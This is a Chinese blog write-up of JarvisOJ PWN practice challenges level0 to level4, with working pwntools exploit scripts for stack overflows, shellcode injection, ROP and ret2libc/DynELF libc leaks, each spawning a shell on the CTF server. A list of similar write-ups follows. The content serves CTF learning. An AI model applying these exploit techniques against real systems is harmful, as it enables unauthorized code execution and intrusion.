JarvisOJ PWN level系列 wp

最新推荐文章于 2022-10-13 19:57:00 发布
最新推荐文章于 2022-10-13 19:57:00 发布
阅读量433 收藏 5
点赞数 1
分类专栏: # PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/103995749
版权

菜菜的小白最近学习pwn,做了Jarvis上的一些题目进行练习,也从很多师傅的博客里学习到了很多新的知识,今天重新温习并且总结一下,以下的wp可能会比较详细,大佬可略:

level0

这一题的难度还是蛮容易的,首先拖进ida里,发现有'/bin/sh/字符串和system函数,然后找溢出点,发现read函数这里发生溢出,只给了0x88的内存,但是却要读0x200个字节,必溢出:

然后构造一个溢出,让返回地址变成指定的地址(即system函数的地址),写一个脚本就可以getshell了:

# -*- coding:utf-8 -*-
from pwn import *


sh = remote("pwn2.jarvisoj.com",9881) 
junk = 'a'*0x80


fakebp = 'a'*8
syscall = 0x0000000000400596
payload = junk + fakebp + p64(syscall)
sh.send(payload)
sh.interactive()

level1

拖进ida里进行查看:

先确认一下思路,首先发现溢出点,并且可以知道buf的地址,所以我们就要在已知的buf地址上构造shellcode。

由于栈的大小是0x88,read函数能够读入的范围是0x100到buf,所以可以通过溢出来让函数跳转到shellcode的地址进行执行。

首先先生成一段shellcode,使用pwntools里固有的函数进行构造:shellcode=asm(shellcraft.sh())

接着我们需要确定跳转的地址,checksec发现该程序没有开启任何保护措施,所以就在缓冲区内构造shellcode并用buf作为起始地址,下面上脚本:

from pwn import *

p = remote('pwn2.jarvisoj.com', 9877)
#p = process("./level1")
#接收从下标为第14位到倒数第二位的字符串
text = p.recvline()[14:-2]
print text[14:-2]
#将text字符串通过int函数转换为16进制的地址,作为跳转的地址
buf_addr = int(text, 16)
shellcode = asm(shellcraft.sh())

payload = 'a' * (0x88+4-len(shellcode)) + shellcode +  p32(buf_addr)
p.send(payload)
p.interactive()

level2

拖进ida反汇编,找溢出点,发现溢出:

发现了system函数,还发现了'/bin/sh'字符串,所以可以通过把传入参数变成'/bin/sh'然后通过调用system('/bin/sh')得到shell:

(此图源自https://blog.csdn.net/github_36788573/article/details/80004451

注意不能在vulnerable函数的返回地址后面直接跟参数,我们需要模拟call system函数的过程,在这个过程中call有一步是将下一条指令的地址压栈,所以我们需要构造一个假的返回地址,当然这个内容随意。上脚本:

# -*- coding:utf-8 -*-

from pwn import * 

p = remote('pwn2.jarvisoj.com', 9878)

payload = 'a' * 0x88 + 'a' * 4 + p32(0x08048320) + p32(0xdeadbeef) + p32(0x0804A024)
#0xdeadbeef/"aaaa"为system("/bin/sh")执行后的返回地址,可以随便指定
p.sendlineafter("Input:\n", payload)

p.interactive()

level2_x64

结构和level2的差不多,溢出点也相同,区别在于32位的是通过栈传参,而64位通过寄存器传参。

所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可以做到,利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi,在执行pop语句时,只要保证栈顶元素是”/bin/sh”的地址,并将返回地址设置为system。


————————————————
版权声明:本文为CSDN博主「yudhui」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/github_36788573/article/details/80008536

思路已经清晰了,现在上脚本:

from pwn import *

p = remote('pwn2.jarvisoj.com','9882')
#p = process("./level2")

elf = ELF('./level2x64')

payload = 'a' * 0x80 + "bbbbbbbb"
pop_rdi_addr = 0x00000000004006b3
sh_addr = elf.search('/bin/sh').next()
print p64(sh_addr)
#sh_addr = 0x0000000000600A90

system_addr = elf.symbols['system']
print p64(system_addr)

junk = 'a' * 0x88

#ROPgadget --binary level2_x64 --only 'pop|ret '

payload = junk + p64(pop_rdi_addr) + p64(sh_addr) + p64(system_addr)  
p.sendline(payload)
p.interactive()

level3(return_to_libc)

首先拿到一个压缩包,解压之后发现程序以及libc-2.19.so文件,拖到ida里,首先发现vul_fuction的read函数可以溢出。发现程序没有system函数和”/bin/sh”,要如何getshell呢?

首先我们想到要获取system函数的地址。这就需要利用到在libc.so文件中各个函数的相对位置和加载到内存中之后各个函数的相对位置相同这一特性来获取。

我们在程序中发现了write函数,write函数可以将东西写出来,所以我们就可以将write函数在内存中的地址泄露出来,由于system和write函数在libc.so文件中的地址是可以知道的,那么进而我们就可以通过动态链接库的特性知道system在内存中的的地址,以及”/bin/sh”在内存中的地址,于是就可以调用system(“/bin/sh”)达到获取shell的目的。

有关plt和got表的知识参考:https://www.jianshu.com/p/0ac63c3744dd

至于write函数在内存中的地址是保存在got表中,在第二次运行write函数的时候,got表中就已经记录了write的地址。再次返回func函数为了是进行二次溢出,后面三个分别是wirte函数的参数 ,1表示标准输出流stdout,中间是write是要输出的地址,这里要输出writegot,4是输出的长度,上脚本:

from pwn import * 
                                                                 
#conn=process('./level3')
conn=remote("pwn2.jarvisoj.com",9879)
libc=ELF('./libc-2.19.so')
e=ELF('./level3')
pad=0x88
vulfun_addr=0x0804844B  
write_plt=e.symbols['write'] 
#write_got=e.got['write'] 
write_got = 0x0804A018
payload1='A'*pad+"BBBB"+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)
#溢出地址+返回地址+参数
conn.recvuntil("Input:\n")
conn.sendline(payload1)

write_addr=u32(conn.recv(4))

#calculate the system_address in memory
libc_write=libc.symbols['write']
#libc_system=libc.symbols['system']
#libc_sh=libc.search('/bin/sh').next()
#libc_read_addr = 0x000dde30
libc_system = 0x00040310
libc_sh = 0x162d4c
system_addr=write_addr-libc_write+libc_system 
sh_addr=write_addr-libc_write+libc_sh

payload2='A'*pad+"BBBB"+p32(system_addr)+ "dead" +p32(sh_addr)
conn.sendline(payload2)
conn.interactive()

相关博客参考:https://blog.csdn.net/github_36788573/article/details/80069404

https://www.jianshu.com/p/35c757ef9d89   https://www.bbsmax.com/A/mo5kNV14Jw/

level3_x64

程序和level3的差不多,就是要注意64位程序的传参,直接上脚本吧:

from pwn import*

#p = process('./level3x64')
p = remote('pwn2.jarvisoj.com',9883)
libc = ELF('./libc-2.19.so')
e = ELF('./level3_x64')

pop_rdi_ret = 0x00004006b3
pop_rsi_ret = 0x00004006b1
write_plt = e.plt['write']
write_got = e.got['write']
#vul_addr = e.symbols['vulnerable_function']
vul_addr = 0x4005e6
payload1 = 'a' * 0x88 + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(write_got) + p64(0xdeadbeef) + p64(write_plt) + p64(vul_addr)
p.recvuntil("Input:\n")
p.sendline(payload1)

write_addr=u64(p.recv(8))
print(write_addr)

libc_write = libc.symbols['write']
libc_system = libc.symbols['system']
libc_sh = libc.search('/bin/sh').next()

system_addr = write_addr-libc_write+libc_system 
sh_addr = write_addr-libc_write+libc_sh

payload2 = 'a' * 0x88 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr) + p64(0xdeadbeef)

p.sendline(payload2)
p.interactive()

附件更新了....因为这个卡了好久....枯了QAQ/

po出两个x86和x64传参时栈帧结构链接:32位:https://www.jianshu.com/p/c90530c910b0

64位:https://www.jianshu.com/p/f3ebf8a360f0

level4

拿到附件之后打开发现没有libc文件,之后学习到用DynELF来做,利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,于是我们可以将其写入bss段,然后控制read函数,通过调用read函数写入字符串,下面上脚本。

(DynELF的相关学习链接:https://blog.csdn.net/qq_40827990/article/details/86689760

from pwn import *

#p = process('./level4')
p = remote('pwn2.jarvisoj.com','9880')

e = ELF('./level4')
write_plt = e.symbols['write']
vul_addr = e.symbols['vulnerable_function']
bss_addr = 0x0804A024
def leak(addr):
	payload = 'a' * 0x88 + "bbbb"
	payload += p32(write_plt)
	payload += p32(vul_addr)
	payload += p32(0x1)
	payload += p32(addr)
	payload += p32(0x4)
	p.send(payload)
	data = p.recv(4)
	return data

d = DynELF(leak,elf = e)
system_addr = d.lookup('system','libc')

#read_addr = e.symbols['read']
#read_addr = d.lookup('read','libc')
read_addr = 0x08048310
payload2 = 'a'*0x88 + "bbbb" + p32(read_addr) + p32(vul_addr) + p32(0) + p32(bss_addr) + p32(8)
p.send(payload2)
p.sendline('/bin/sh')

payload3 = 'a'*0x88 + "bbbb" + p32(system_addr) + p32(0xdeadbeef) + p32(bss_addr)
p.sendline(payload3)

p.interactive()

 

43v3rY0unG
关注
专栏目录
Jarvis OJ-PWN
weixin_45461609的博客
08-08 254
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
jarvisoj pwn level5 wp
zszcr的博客
03-26 1966
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 322
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
JarvisOJ PWN fm wp
苗_的博客
01-24 345
fm 拿到之后首先ida一下,看一下主函数,找漏洞点: 然后就发现第10行是一个很简单的格式化字符串漏洞,看一下x的内存地址: x的值是3,所以要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第几个参数来确定[i]的值,由于x_addr在32位程序...
jarvis oj pwn
qq_44813849的博客
07-24 226
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
Jarvis OJ-PWN-[XMAN]level1 wp
分不清东西南北的Laffey
09-26 1137
地址:nc pwn2.jarvisoj.com 9877 第一步:用checksec看开启了哪些保护 32位的 程序编译时关了栈不可执行保护 第二步:用IDA看伪代码 进去之后F5看到主函数 跟进vulnerable_function()函数 第三步:找到溢出点并加以分析 我们需要覆盖函数的返回地址 将其地址覆盖成shellcode的返回地址 这道题不像level0 里面有system函数...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 523
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
[BUUCTF]Pwn刷题记录
x0r
10-13 227
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1328
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
Jarvis OJ pwn刷题
清霂的博客
03-26 252
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
jarvisoj pwn level系列
weixin_45551695的博客
05-26 215
某重新入坑的小白试图学会如何打pwn 从现在开始,个人计划也就开始了,希望能走下去吧, 先看看blibli这个基础的 CTF pwn 小白基础课 后面的UP主后面有,讲得浅显易懂 有基础有能力有时间的可以看看这个人 我不认识他但是货很干,很厉害,可以看看他的博客 然后 不多说,来搞事情 做题网站 level0 首先,下下来这个东东 拿到程序后先file可知为64位程序和动态链接 cheksec一下检查保护机制 我们能看到这个玩意,可以看到是一个只开启了NX的64位linux程序。 Stack:栈保护 R
JarvisOJ PWN level1 wp
苗_的博客
01-08 252
level1 checksec看一下保护,几乎没什么保护措施: 先拖进IDA里面看一下(f5大法好),发现栈溢出点: f12没发现"/bin/sh",看一下printf函数会把buf的地址输出出来,我们将它截取,并保存在buf_addr中。由于NX是关闭的状态,也就是说我们把shellcode写进buf里面,函数返回时跳转回buf的位置,就可以执行shellcode了。因此我们把sh...
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 942
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf里面输入shellcode和填...
jarvisojpwnlevel系列wp
Huiuyao的博客
12-09 2817
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
[JarvisOJ][pwn]Guess
九层台
07-01 860
练习了一个oj平台上的题,感觉收货很多,在这里记下来。 liu@liu-F117-F:~/桌面/oj/猜测$ checksec 1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/\xe7\x8c\x9c\xe6\xb5\x8b/1' Arch: amd64-64-little RELRO: No RELRO Sta...
JarvisOJpwn)guess
苗_的博客
02-26 265
先看一下函数结构: main: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { struct sockaddr addr; // [rsp+0h] [rbp-20h] __pid_t v4; // [rsp+14h] [rbp-Ch] int v5; // [rsp+18h]...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1078
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
(Jarvis Oj)(Pwn) Guess
Nothing
06-17 615
(Jarvis Oj)(Pwn) Guess 查看保护。没开什么保护。 丢到ida中查看程序逻辑。前面不用看,找到handle函数。 可以看到输入是用fget函数处理的,限制了输入的长度,所以不好溢出。再看看flag_correct( )函数。 在nc连远程服务器的时候也提示说,要将flag先encode成hex,所以50个字符的flag就成了100个字符,程序首先判断长度是否...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值